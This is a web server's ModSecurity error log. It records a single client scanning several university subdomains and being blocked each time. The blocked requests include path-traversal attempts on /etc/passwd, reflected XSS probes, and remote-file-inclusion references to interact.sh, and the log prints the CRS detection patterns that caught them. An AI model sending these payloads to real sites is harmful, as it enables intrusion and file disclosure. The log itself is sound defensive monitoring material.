[Tue Aug 29 11:51:34.842684 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VsCo-f0AAAmQ-zoAAAAb"]
[Tue Aug 29 11:51:34.868679 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAnf3kMAAAAM"]
[Tue Aug 29 11:51:34.871740 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAngCToAAAAP"]
[Tue Aug 29 11:51:34.888150 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAnd29wAAAAI"]
[Tue Aug 29 11:51:34.916135 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15VsCo-f0AAAngCTwAAAAP"]
[Tue Aug 29 11:51:34.928383 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15VsCo-f0AAAnB5W4AAAAJ"]
[Tue Aug 29 11:51:34.928851 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15VsCo-f0AAAnd294AAAAI"]
[Tue Aug 29 11:51:34.952105 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15VsCo-f0AAAnd298AAAAI"]
[Tue Aug 29 11:51:34.972157 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15VsCo-f0AAAnepMIAAAAK"]
[Tue Aug 29 11:51:34.982686 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAnf3kgAAAAM"]
[Tue Aug 29 11:51:35.022120 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnf3koAAAAM"]
[Tue Aug 29 11:51:35.039253 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnB5XMAAAAJ"]
[Tue Aug 29 11:51:35.066469 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15V8Co-f0AAAnf3kwAAAAM"]
[Tue Aug 29 11:51:35.080315 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnB5XUAAAAJ"]
[Tue Aug 29 11:51:35.105987 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15V8Co-f0AAAnepMgAAAAK"]
[Tue Aug 29 11:51:35.126855 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15V8Co-f0AAAnepMkAAAAK"]
[Tue Aug 29 11:51:35.136510 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15V8Co-f0AAAnf3k8AAAAM"]
[Tue Aug 29 11:51:35.538899 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15V8Co-f0AAAnepMoAAAAK"]
[Tue Aug 29 11:51:35.538918 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnf3lAAAAAM"]
[Tue Aug 29 11:51:35.540933 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAm7nAEAAAAE"]
[Tue Aug 29 11:51:35.560632 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15V8Co-f0AAAnepMsAAAAK"]
[Tue Aug 29 11:51:35.561131 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnf3lEAAAAM"]
[Tue Aug 29 11:51:35.582182 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15V8Co-f0AAAnepMwAAAAK"]
[Tue Aug 29 11:51:35.603579 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnepM0AAAAK"]
[Tue Aug 29 11:51:35.606988 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnd2@oAAAAI"]
[Tue Aug 29 11:51:35.613529 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15V8Co-f0AAAnf3lMAAAAM"]
[Tue Aug 29 11:51:35.633261 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAhoHPMAAAAl"]
[Tue Aug 29 11:51:35.713503 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15V8Co-f0AAAm7nAcAAAAE"]
[Tue Aug 29 11:51:35.713919 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15V8Co-f0AAAnkwa4AAAAY"]
[Tue Aug 29 11:51:36.596814 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15WMCo-f0AAAnHQfkAAAAT"]
[Tue Aug 29 11:51:39.544580 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAlUlkwAAAA0"]
[Tue Aug 29 11:51:39.548619 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAngCUgAAAAP"]
[Tue Aug 29 11:51:39.569659 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAm80QsAAAAF"]
[Tue Aug 29 11:51:39.596131 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAnkwbkAAAAY"]
[Tue Aug 29 11:51:39.666926 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAnmT1kAAAAd"]
[Tue Aug 29 11:51:40.876271 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAmLPUsAAAAN"]
